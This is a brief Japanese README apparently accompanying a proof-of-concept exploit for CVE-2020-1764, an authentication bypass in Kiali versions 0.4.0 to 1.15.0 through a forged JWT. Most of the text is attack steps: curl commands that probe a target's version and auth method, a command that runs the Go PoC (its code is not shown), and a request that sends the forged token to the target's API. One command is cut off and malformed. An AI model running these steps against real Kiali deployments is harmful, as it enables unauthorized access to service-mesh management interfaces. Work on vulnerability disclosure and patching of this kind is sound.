
CVE-2020-1764の概念実証エクスプロイト。Kiali 0.4.0~1.15.0の認証バイパス。巧妙に細工されたJWTトークンを介して、不正なAPIアクセスを可能にします。
Kiali 0.4.0 から 1.15.0 を対象とした、ログイン認証方式を使用した認証バイパス PoC(セキュリティ情報)
バージョンの確認: `curl 'http:///api
認証方式の確認: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"